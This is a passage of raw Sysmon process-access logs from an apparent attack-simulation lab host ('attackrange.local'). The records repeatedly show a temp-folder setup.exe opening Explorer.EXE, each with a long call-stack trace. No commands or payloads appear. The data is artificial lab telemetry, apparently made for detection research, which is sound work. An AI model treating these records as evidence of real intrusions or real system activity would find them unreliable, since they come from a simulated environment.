w64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
